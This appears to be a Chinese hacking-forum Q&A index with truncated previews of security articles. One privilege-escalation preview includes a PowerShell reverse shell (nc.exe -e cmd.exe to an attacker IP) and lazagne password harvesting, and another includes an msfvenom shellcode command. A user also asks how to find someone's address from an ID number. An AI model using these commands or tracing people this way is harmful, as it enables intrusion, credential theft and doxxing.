问答中心
来自黑客世界帮助中心部分;你可以在任何与技术和信息学相关的话题上寻求帮助。
查看问题
没有热门问题
-
1 票1 个答案
-
-1 票4 个答案
-
-1 票8 个答案
-
0 票1 个答案
-
0 票0 个答案
1,363个问题在此版块
-
如何制作BADUSB黑客U盘?插入可以自动执行程序?
收集的资料文件可以都发出来啦,大家共同学习。
1 票1 个答案 -
最近中了复制粘贴木马,怎么消除啊啊啊啊啊
我也不知道我是在什么情况下中了这个木马的,电脑需要转泰达币给朋友 结果复制朋友发送过来的地址后 粘贴到别的地方就变成别的地址了 当时也没有注意,结果损失了1W USDT 有哪个大神知道这个是什么玩意啊 ~~~专业名词叫什么来着啊
-1 票8 个答案 -
DDoS攻击原理是什么?DDoS攻击原理及防护措施介绍
DDoS攻击原理是什么?DDoS攻击原理及防护措施介绍 DDoS攻击原理是什么?随着网络时代的到来,网络安全变得越来越重要。在互联网的安全领域,DDoS(Distributed DenialofService)攻击技术因为它的隐蔽性,高效性一直是网络攻击者最青睐的攻击方式,它严重威胁着互联网的安全。接下来的文章中小编将会介绍DDoS攻击原理、表现形式以及防御策略。希望对您有所帮助。 DDoS攻击原理及防护措施介绍 一、DDoS攻击的工作原理 1.1 DDoS的定义 DDos的前身 DoS (DenialofService)攻击,其含义是拒绝服务攻击,这种攻击行为使网站服务器充斥大量的要求回复的信息,消耗网络带宽或系统资源,导致网络或系统不胜负荷而停止提供正常的网络服务。而DDoS分布式拒绝服务,则主要利用 Internet上现有机器及系统的漏洞,攻占大量联网主机,使其成为攻击者的代理。当被控制的机器达到一定数量后,攻击者通过发送指令操纵这些攻击机同时向目标主机或网络发起DoS攻击,大量消耗其网络带和系统资源,导致该网络或系统瘫痪或停止提供正常的网络服务。由于DDos的分布式特征,它具有了比Dos远为强大的攻击力和破坏性。 1.2 DDoS的攻击原…
0 票1 个答案 -
查询一个人家庭住址等信息
我知道一个人的身份证号码,怎么得知他的电话号码和地址
-1 票4 个答案 -
Windows全版本本地提权(CVE-2020-0787)
Windows全版本本地提权(CVE-2020-0787) 漏洞概述2020年3月10日,微软官方公布了一个本地提权漏洞CVE-2020-0787,根据微软的漏洞描述声称,攻击者在使用低权限用户登录系统后,可以利用该漏洞构造恶意程序直接提权到administrator或者system权限。system是windows所有操作系统中权限最大的账户。 漏洞详情Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Background Intelligent Transfer Service(BITS)是其中的一个后台智能传输服务组件。 Microsoft Windows Background Intelligent Transfer Service中存在提权漏洞,该漏洞源于该服务无法正确处理符号链接。攻击者可通过执行特制的应用程序利用该漏洞覆盖目标文件,提升权限。 以下产品及版本受到影响:Microsoft Windows 7 SP1,Wind…
0 票1 个答案 -
网络安全基础之网络协议与安全威胁的关系介绍
网络安全基础之网络协议与安全威胁的关系介绍 网络安全基础之网络协议与安全威胁介绍,首先我们要先了解一下网络基础究竟是什么,接下来的文章中小编将会从osi七层模型、TCP/IP协议、OSI模型与TCP/IP协议的对应、数据传输的协议单元以及数据封包和解包过程等方面进行详细的介绍,感兴趣的朋友可以阅读本文进行参考。 OSI(OpenSystem Interconnect),即开放式系统互联。 一般都叫OSI参考模型,是ISO(国际标准化组织)组织在1985年研究的网络互联模型。 网络协议的简介: 定义:协议是网络中计算机或设备之间进行通信的一系列规则集合。 什么是规则? 交通中的红黄绿灯:红灯停,绿灯行就是规则。 OSI七层模型 OSI(OpenSystem Interconnect),即开放式系统互联。 一般都叫OSI参考模型,是ISO(国际标准化组织)组织在1985年研究的网络互联模型。 (1)物理层(Physical Layer) 物理层是OSI参考模型的最低层,它利用传输介质为数据链路层提供物理连接。它主要关心的是通过物理链路从一个节点向另一个节点传送比特流,物理链路可能是铜线、卫星、微波或其他的通讯媒介。 (2)数据链路层(Data L…
0 票0 个答案 -
在goland中读取tpl文件的图文操作
在goland中读取tpl文件的图文操作 近来开始研究golang,使用国人做的beego框架做页面开发,以前用pycharm开发的,所以习惯了 就采用了goland,不过有个问题,就是在做页面模版时候采用tpl后缀,需要进行设置一下。(mac系统,如果windows系统 在setting中)如下: 按顺序 editor->file types,在recongized fiel types中找到HTML,然后在下面可以看到 后缀形式,点击添加*.tpl 然后保存退出 就可以搞定了。 接下来 是补全问题: 要用到一些特殊的格式,比如 {{ … }},{{ if }}{{end}}等等,如果不设置,只能一个符号一个符号的输入。现在教大家如何设置自动补全这些东西。 按顺序是在editor->live templates 中 选择添加 添加标签 Abbreviation 处添加标签,比如 if Description 是描述这个标签用途的,随便写。 Template text 就是补全的文本了。 $END$表示补全后光标移动到此处。 选择标签应用到哪些文件类型 使用时在tpl或者其他html文件中 输入if进行tab 就可以补全。 补充…
0 票0 个答案 -
MySQL修改存储过程的详细步骤
MySQL修改存储过程的详细步骤 在实际开发中,业务需求修改的情况时有发生,这样,不可避免的需要修改存储过程的特征 MySQL中,使用ALTER语句修改存储过程的特性 语法格式 ALTER {PROCEDURE | FUNCTION} sp_name [characteristic……] 参数说明 Sp_name,表示存储过程或函数的名称characteristic,表示要修改存储过程的哪个部分Characteristic的取值如下CONTAINS SQL,表示子程序包含SQL语句,但是,不包含读或写数据的语句NO SQL,表示子程序中,不包含SQL语句READS SQL DATA,表示子程序中,包含读数据的语句MODIFIES DATA,表示子程序中,包含写数据的语句SQL SECURITY {DEFINER | INVOKER},指明谁有权限来执行DEFINER,表示只有定义者,自己才能够执行INVOKER,表示调用者可以执行COMMENT'string',表示注释信息修改存储过程CountProc1的定义 将读写权限,改为MODIFIES SQL DATA,并指明调用者可以执行 查看修改后的信息 目前,MySQL还不提供对已存在的存储过…
0 票0 个答案 -
分享五大免费企业网络入侵检测(IDS)工具
分享五大免费企业网络入侵检测(IDS)工具 Snort Snort是最好的入侵检测系统(IDS)工具。它所需要的是一些在上面运行的硬件以及安装、配置和维护的时间。Snort可以在任何操作系统上运行,包括Windows和Linux。 Snort 一直都是网络入侵检测(IDS)和入侵防御工具(IPS)的领导者,并且,随着开源社区的持续发展,为其母公司Sourcefire(多年 来,Sourcefire提供有供应商支持和即时更新的功能齐全的商业版本Snort,同时仍然免费提供功能有限的免费版本Snort)持续不断的支 持,Snort很可能会继续保持其领导地位。 虽然Snort“称霸”这个市场,但也有其他供应商提供类似的免费工具。很多这些入侵检测系统(IDS)供应商(即使不是大多数)结合Snort或其他开源软件的引擎来创建强大的免费入侵检测服务。 Security Onion Security Onion是用于网络监控和入侵检测的基于Ubuntu的Linux发行版。该镜像可以作为传感器分布在网络中,以监控多个VLAN和子网,这很适用于 VMware和虚拟环境。该配置只能用作IDS,目前不能当作IPS运行。然而,你可以选择把它作为网络和主机入侵检测部署,以…
0 票0 个答案 -
黑客常用的WiFi硬件工具(用于WiFi蓝牙等无线信号破解)
黑客常用的WiFi硬件工具(用于WiFi蓝牙等无线信号破解) 【本文初衷:很多粉丝在看了之前的文章以后,在后台留言,能否推荐一些比较理想的WiFi渗透学习工具,作者回复了很多,但由于咨询人员太多,才特意整理了这篇文章,文章中所有推荐的工具,均可在亚马逊官方网站正常购买,但请尊重网络法规,不要用于任何非法用途】 入侵/破解WiFi很难吗?并非如此。只是需要耐心,就像生活中的任何事情一样,您只需要下定决心,很多事情其实都很简单。 之前在另一篇文章中,我曾经分享过WiFi Hacking软件工具,如果你想阅读原文可以搜索,在本文中,我们将介绍特定的WiFi Hacking硬件设备,这将有助于你在日常的渗透测试中事半功倍。 今天我将为你们列出很多非常实用的WiFi Hacking硬件工具,这些工具能够入侵无线网络,作为渗透测试使用,接下来文章中我将为你们列出同类设备中最为理想的一些工具,如果你有这方面的兴趣,可以考虑采购,基于一些特殊原因,购买这些设备,需要在亚马逊网站,如果你是一个专业研究人员,这些硬件工具,一定会帮助到你,当然,即使你只是为了破解WiFi密码,也是非常理想的选择。 这些工具通常是渗透测试人员在参与测试其客户端WiFi网络的“安全性”…
0 票0 个答案 -
无需脱壳抓取软件加密包方法(逆向破解)
无需脱壳抓取软件加密包方法(逆向破解) 夜神模拟器 6.6.0.5 Android version 5.1.1 Xposed.installer(5.11安卓系统) Xserver (0.6.2) 4.42安卓模拟器Xposed框架链接: https://pan.baidu.com/s/1depSSHCy0KYcFZzkPH7aZQ 密码: vmyr 5.11安卓模拟器Xposed框架链接: https://pan.baidu.com/s/1erZD4gMk1MQdVklnrmSuLg 密码: s4j4 Xserver下载 https://github.com/monkeylord/XServer Starting安好xp框架,然后安装好xserver 两个坑: xp框架安装好后重启后发现未激活 - 重启后重新安装 (这里我没遇到)xserver安好后激活了模块之后发现还是无法激活 - 重启Android。重启之后还是没用重新安装xp框架 随便安个APP,拿的某音作为测试,打开某音。然后在Xserver选中对应的app adb连接 adb connect 127.0.0.1:62001 adb shell //检查8000端口是否真的打开…
0 票0 个答案 -
基于Web攻击的方式发现并攻击物联网设备介绍
基于Web攻击的方式发现并攻击物联网设备介绍 近二十年来,DNS重绑定(DNS rebinding)攻击一直是讨论的话题。尽管浏览器厂商做出了努力,但仍然无法找到一个能稳定抵御这些攻击的防御系统。据说这类问题八年前就已经被修复了。但是这类攻击通过新的攻击向量再次出现。 总的来说,可以肯定未来的黑客活动将通过多个现有攻击组合形成新的攻击向量。这些新攻击向量的一个很好的例子就是攻击加密货币钱包的DNS重绑定攻击。 在本文中,我们讨论了Princeton(普林斯顿大学)和UC Berkeley(加州大学伯克利分校)关于基于web的方式攻击物联网设备的研究,这些攻击会导致设备被黑客发现、攻击和接管。研究于2018年8月发表。 设备与黑客发现和攻击物联网设备的方法 研究人员的目标是测试15个物联网设备。这些设备中只有七台有本地HTTP服务器,所以研究的重点放在它们上,它们包括:Google Chromecast、Google Home、一台智能电视、一个智能开关和三个摄像头。 使用的攻击方法是: 欺骗受害人,诱导他们访问攻击者控制的网站。 在受害者的本地网络上发现物联网设备。 通过基于web的攻击控制设备。 攻击的持续…
0 票0 个答案 -
2020年黑客常用-最佳数据包嗅探工具(详解)
2020年黑客常用-最佳数据包嗅探工具(详解) 我们在此处列出的工具会随用途的不同而变化,也会根据实际使用的情况,甚至是开发者的更新情况而变化,但是,我们也会尽可能的列出我们过去使用过的许多真正有用的程序嗅探器工具,并整理成文章,方便初学者认识这些工具。 文章篇幅较长,阅读需要十五分钟左右,你可以先收藏,以便于后期逐步学习。 HTTP协议和heck(整个Internet)都依赖于并致力于使用TCP / IP和UDP 协议(以及其他许多同体)。 任何阅读此页的人都应该意识到,如果您想要打破流程或试图“破坏”“数据包”的传输,则必须理解协议的工作原理。 对于完全不了解数据包行为的用户,我们强烈建议您了解它,否则你永远不可能成为一个合格的渗透测试人员。 能够截取并利用“欺骗”数据包是网络安全性的一个主要点,如果您可以掌握如何使用下面列出的工具,那么将是一个很好的开始。 我们试图列出可以找到(并已使用)的“最佳数据包嗅探工具”,但与大多数事物一样,在IT领域中,它也在不断发展。 WiresharkDSniffScapyCain & AbelEtherapeEttercapINSSIDERKisMACKisMETNetstumblerNetwor…
0 票0 个答案 -
网站入侵渗透测试之各种Windows提权思路讲解(八种最新方法)
网站入侵渗透测试之各种Windows提权思路讲解(八种最新方法) 学习技术只为更好的保障自身 公司安全,切勿违规操作,有什么不懂的技术问题可以私聊~方法一:winPEAS寻找可提权的地方仓库地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite 也可以用lazagne来收集密码,如果找到一个RDP可连接密码,可以用以下ps1来运行执行命令 $secpasswd = ConvertTo-SecureString "password321" -AsPlainText -Force $mycreds = New-Object System.Management.Automation.PSCredential ("john", $secpasswd) $computer = "GHOST" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","192.168.0.114 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $c…
0 票0 个答案 -
看看黑客是如何利用U盘入侵你的电脑的
看看黑客是如何利用U盘入侵你的电脑的 攻击 如下是一封礼品卡的信,信中还附有一个USB设备。但是该USB设备实际上含有恶意软件。 图 1. 含有恶意USB设备的礼品卡 分析 研究人员查看设备的相关信息,发现有打印的“HW-374”信息,谷歌搜索发现http://shopee.tw一个“BadUSB Leonardo USB ATMEGA32U4”。 图 2: 与收到的USB设备匹配的网站图片 该设备使用了Arduino微控制器ATMEGA32U4,被变成用来模拟USB键盘。因为PC设备默认是相信USB键盘设备的,插入电脑后,键盘模拟器就会自动注入恶意命令。 为了快速获取UBS的payload,研究人员将其连接到一个air-gapped的笔记本,安装的是Ubuntu系统,研究人员分析发现了以下payload。 Powershell Payload 图 3. 使用VIM拦截Payload,发现一个混淆的PowerShell脚本 解混淆PowerShell命令一个简单的密文替换。 图 4.使用CyberChef解混淆的PowerShell命令 解混淆的字符串中有一个从hxxps://milkmovemoney[.]com/st/mi.ini处下…
0 票0 个答案 -
让黑客在内网为所欲为的“凭据转储”攻击应该如何防御?
让黑客在内网为所欲为的“凭据转储”攻击应该如何防御? 导语:在Windows网络上使用这五项技巧来发现和限制企业组织遭受凭据转储攻击的漏洞风险。 凭据转储是网络攻击者用于获取目标网络持久访问权的一项重要技术。他们通过网络钓鱼的方式潜入目标企业的网络工作站中,然后利用管理员管理和监视网络的典型方法从操作系统和软件中获取帐户登录名和密码信息,通常是哈希或明文密码形式的信息。进行凭据转储后,攻击者就可以使用这些凭据进行横向移动及访问受限信息。 凭据对于攻击者而言是如此重要,以致在许多情况下,获取用户名和密码不仅是达到目的的手段,而且是攻击的整个目标。因此,在各种犯罪论坛上,凭据都是可出售的商品,并且有些网站可以追踪公开的凭据转储情况。 可以说,任何企业组织都可能存在使他们容易受到凭据转储攻击影响的漏洞。以下是识别此类漏洞或限制这种风险的5种方法,希望可以帮助企业组织更好地防范凭据转储攻击。 1. 限制凭据重用 根据《Verizon数据泄露调查报告》显示,“凭据重用”仍然是攻击者获取权限或在内网移动的主要方式之一。这是有道理的,因为对于攻击者来说,用户名和密码并不难获取。弱密码、密码重复使用和众多的密码公开泄露使得攻击者能够轻松找到入侵网络的凭据。他们…
0 票0 个答案 -
如何学习黑客?Web(网站)渗透测试
如何学习黑客?Web(网站)渗透测试 eb渗透笔记如下,大家可以去看看! 0x00 序言这篇笔记是对Web应用程序渗透中的经典步骤的总结。我会将这些步骤分解为一个个的子任务并在各个子任务中推荐并介绍一些工具。 本文展示的许多技巧来自这里,作者已允许转载。 请记住我介绍的这些步骤都是迭代的,所以在一次渗透过程中,你可能会使用他们多次。举个栗子,当你设法获取一个应用程序的不同等级的权限时,比如从普通用户提升到管理员用户,可能就需要迭代利用。 序言最后需要说明的是,这篇笔记的很多地方使用了收费的PortSwigger的Burp Suite Professional。对此我表示抱歉,但我认为这个工具还是物超所值的。 0x01 信息收集在一次Web渗透过程中,信息收集的目的是站在旁观者的角度,去了解整个Web应用的全貌。1. 目标确认工具简介Whois基于RFC 3912,用于查询域名相关信息的协议。Dig域名信息获取工具(Domain information groper)简称,是一个命令行的用于查询DNS服务器的网络管理工具。DNSRecon自动化DNS枚举脚本,由darkoperator维护。 1.1 域名注册信息通过如下步骤确认目标所有者信息: W…
1 票0 个答案 -
渗透测试之Kerberos委派攻击 内网入侵章
渗透测试之Kerberos委派攻击 内网入侵章 0x00前言昨天晚上在先知社区见到相关的Keberos委派攻击的文章。晚上在弄别的事情没有实验,早上抽空实验一波. 此教程文章只用于安全参考!!切勿使用技术违规操作!! 有什么其它问题地方可以私聊指出,谢谢。 0x01环境Windows server 2008 R2:192.168.1.122 (AD) Windows 7:192.168.1.107 工具:mimikatz、keke0x02何为委派先知社区的解释:域委派是指将域内部用户的权限委派给服务账号,使用服务账号能以用户的权限在域内展开活动 安全客机的解释:在域中如果出现一种使用Kerberos身份验证访问域中的服务B,而B再利用A的身份去请求域中的服务C,这个过程就可以理解为委派 0x03委派的分类委派分为两种: 非约束委派约束委派非约束委派: 非约束委派在Kerberos中实现时,用户可以从KDC处得到的TGT发送给访问的service1(可以是任意服务),service1拿到TGT之后可以通过TGT访问域内部任意其他服务,所以被称为非约束委派。 约束委派: 由于非约束委派的不安全性,微软在Windows 2003中发布了约束委派的功能。…
0 票0 个答案 -
网站渗透测试之手工PE注入
网站渗透测试之手工PE注入 实验首先实验PEsecurity检查是否有ASLR ASLR(地址空间布局随机化)是一种针对目标重叠的安全保护技术,通过对堆,栈,共享库映射等线性区域布局的随机化,通过增加攻击者预测目的地址的难度,防止攻击者直接定位攻击代码位置,达到阻止溢出攻击的目的 无ASLR,那么使用LordPE打开,并新建一个区段 由于新加了一个片段,EXE现在无法打开,使用HxD插入1000个00(就是虚拟大小) 测试能否正常打开 OD打开找到添加的细分 将入口点转化 jmp 00412000 之后单独保存为一个exe,然后在打开右键跟随jmp就可以去到定义的空白段了 msfvenom生成一个弹Messagebox的shellcode(32位) msfvenom -p windows/messagebox text="it's demo" -f hex(懒得在生成一遍) 复制生成的shellcode,然后在空白段大部分,二进制->二进制数组 之后在保存执行即可看见效果 恢复程序正常执行,既然执行了我们要的玩意那么就要恢复原来的程序正常执行 PS:生成什么反弹meterpreter和执行命令的shell…
0 票0 个答案 -
只有十几岁,能不能学黑客技术或网络安全?
只有十几岁,能不能学黑客技术或网络安全? 成为一个黑客,是很多人心里的梦,有的人只是想想,有的人付出行动。可以说不少爱好者都有这个想法,但是年龄太小,也不知道该不该学,接下来小风教程网给你几点建议! 1、学业不可弃放弃学业去学习一项技术,相信这种人已经越来越少了,现在不是以前,九年义务也是免费的,十多岁就放弃学业,这显然是不理智的,我们都见过很多小学或初中就出来工作,我们不敢说肯定,都是大部分人都是去工厂打工,一个月三四千是普遍情况,但是离开了工厂,他们在社会没有任何竞争力,也只能做一些吃苦的工作。所以啊,无论你多热爱某个技术和爱好,黑客技术也好,你都不应该放弃你的学业。可以在学习时间有闲暇时做自己的爱好,但是还是要学习为主。等上了大学就可以好好学你热爱的技术,甚至参加黑客ctf大赛。 2、大多黑客都是十多岁开始学习也许你觉得年龄小学东西又笨又慢,但是实际上大部分的黑客都是十几岁就有很强的学习能力,对计算机也很有专研精神,比成年人有更大的优势,因为这个年龄学黑客技术,纯粹是爱好,没有目的。你能想象出,早期的互联网盗号软件,刷钻教程,网页钓鱼基本上都是十五六岁的人干的么,虽然他们有违法的成分,但是不可否认他们都是靠自己的学习能力学会的。媒体喜欢炒作…
0 票0 个答案